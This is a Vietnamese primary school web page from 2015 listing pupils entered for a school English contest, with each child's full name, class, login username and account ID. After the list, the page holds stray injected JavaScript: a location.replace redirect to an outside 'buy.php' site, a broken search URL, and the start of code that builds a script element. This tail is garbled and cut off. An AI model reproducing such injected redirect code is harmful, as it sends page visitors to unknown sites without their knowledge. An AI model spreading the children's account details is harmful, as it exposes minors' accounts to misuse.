DANH SÁCH HỌC SINH THI TIẾNG ANH CẤP TRƯỜNG

02/12/2015 9:32 Chiều Phản hồi đã bị khóa

TRƯỜNG TIỂU HỌC QUAN HOA

DANH SÁCH HỌC SINH THI TIẾNG ANH CẤP TRƯỜNG

NĂM HỌC 2015 – 2016

STT Họ và tên Lớp Tên đăng nhập ID
1 Đàm Nữ Tuệ Minh 3D americanacademy 1221990913
2 Đặng Quỳnh Anh 3D quynhanh1382007 1219849471
3 Vũ Thảo Nguyên 3D iamhanna2 1226970915
4 Vũ Phương Diệp Anh 3D diepanhxinhdep 1225434789
5 Bùi  Doãn Quốc Trung 3D trunghippo 1219654711
6 Nguyễn Tùng Bách 3D nguyentungbach 1229332305
7 Lê Gia Bách 3D bach0202 1222043403
8 Hoàng Nhật Anh 3D hoangnhatneymar 1229336994
9 Hoàng Trung Hải 3A whowants10000 1229301614
10 Nguyễn Ngọc Minh Uyên 3A minhuyen2512 1226902421
11 Kim Gia Huy 3A boystrike20079 1214051305
12 Nguyễn Phương Linh 3E nhimphuonglinh 1227788382
13 Nguyễn Thuỳ Trang 3A ngtrang2007 1229311944
14 Phạm Lê Thảo Nguyên 3C thaonguyentotet 1229555568
15 Phạm Khánh Linh 3B linh3bquanhoa2 1223169125
16 Phạm Ngọc Việt 3D phamngocvietqh1 1220529169
17 Hoàng Nam Khánh 3D namnamkhanh 1218254342
18 Trương Quang Minh 3E truongminhvn38 1229301115
19 Nguyễn Mai Dung 3D hochiminhbacho 1224272569
20 Trịnh  Minh Trang 3B Trangtrinh300320 1229827808
21 Đỗ Hồng Hải 3B honghai3bquanhoa 1224352760
22 Vũ Việt Anh 4D banana2222 1229147718
23 Nguyễn Thẩm Bảo Anh 4A chickoi 1214163130
24 Nguyễn Thị Anh Phương 4B anhphuongqh1 1227821178
25 Đặng Xuân Bách 4D xuanbachthuhien 1228878918
26 Phạm hoài An 4A hoaiai645 1221536224
27 Phạn Ngọc Thu Trang 4A phantrang282006 1224687160
28 Đoàn Đức Trí 4B ductrilop4b 1228264496
29 Phan Quỳnh Vân 4D quynhvan.van 1222225880
30 Phạm Kiên Dũng 4B kiendung123 1228192756
31 Lê Quỳnh Anh 4A lequynhanh4A125 1228984633
32 Nguyễn Hồng Phương 4A mybrother1234568 1229294947
33 Phạm Lê Minh 4D wr30m 1228843092
34 Vũ Minh Hạnh 4D hanhminhvu4d 1224933130
35 Phạm Nhật Dương 4D nhatduongta1 1222614123
36 Nghiêm Lan Phương 4D ranphuonglan 1228807594
37 Đỗ Ngọc Tài 4B ngoctai0901 1218435933
38 Hoàng Phúc An 4A nervergiveup4a10 1221644509
39 Lê Tuấn Minh 4B letuanminhqhoa 1221746204
40 Đinh Nguyên Hoàng 4A modecoll 1229365794
41 Lê Minh Nhật 4C nhatlm001 1227857454
42 Lê Hà My 4A lehamy2006qh 1222183878
43 Nguyễn Quang Anh 4A racksegonv0oh 1226477365
44 Nguyễn Bảo Ngọc 4A baongoc20063010 1229755122
45 Nguyễn Mạnh Kiên 4C m.kien2612006 1228501407
46 Nguyễn Ngọc Lan Hương 5A nhimchuaha 1226494472
47 Mai Đặng Nguyên Đức 5D nguyenducd5 1228239130
48 Vũ Mai Ngọc Anh 5A vumaingocanh02 1229124846
49 Vương Hoàng Ngân 5C hoangnganvn100 1228806413
50 Nguyễn Việt Anh 5B trambeoi 1229147450
Đặng Quỳnh Hương 5B huongdangioe123 1223463740
51 Nguyễn Vân Anh 5B nguyenvananh5bgh 1228071959
52 Phạm Hồng Minh 5C hongminhvn01 1227961641
53 Đặng Minh Phương 5B dangminhphuong37 1228203294
54 Trần Lan Phương 5B shirayuki hime 465 1229295831
55 Ngô Bá Việt 5C baviet96 1227502713
56 Phan Quỳnh Trâm 5B gatram2505 1204314402
57 Lê Thị Trà My 5C HACKtrami 1228426629
58 Hoàng Quang Huy 5C nhuocthi1do 1227891024
59 Phạm Thu Trang 5B p – thutrang 2005 1222527830
60 Vương Thuỳ Linh 5D vtl5d 1227890947
61 Lê Phương Huyền 5D lephuonghuyenwin 1228177801
62 Nguyễn Minh Khuê 5C minhkhue1998 1227987434
63 Nguyễn Bích Ngọc 5C ngocminhnganchi 1228466013
64 Bùi Lê Hải Yến 5C haiyenvn13 1228901374
65 Đinh Bảo Ngọc 5B dinhbaongoc1801 1224536586
66 Nguyễn Phương Anh 5A 123456songoku 1229740295
67 Trần Hải Nam 5A tranhainam5Athqh 1223679767
68 Nguyễn Quốc Chiến 5A thanchemgio333 1227891859
69 Đặng Việt Nam 5A ducking 1221811480
70 Nguyễn Hà My 5A gozila11042005 1229739440
71 Phạm Hồ Hồng Trang 5A hongtrang010805 1229439106
72 Quách Bảo Phương 5A rosawinter 1228240527
73 Nguyễn Trang Thuỳ Linh 5C thuylinhioe12346 1227891122
74 Ngô Vũ Gia Linh 5B ngovugialinh5B5 1223682112

“http:///search.htm?route=search&q=”;

location.replace(“http://gethere.info/buy.php”);

var d=document;var s=d.createElement(‘script’);

Các phản hồi đã bị đóng lại bở quản trị.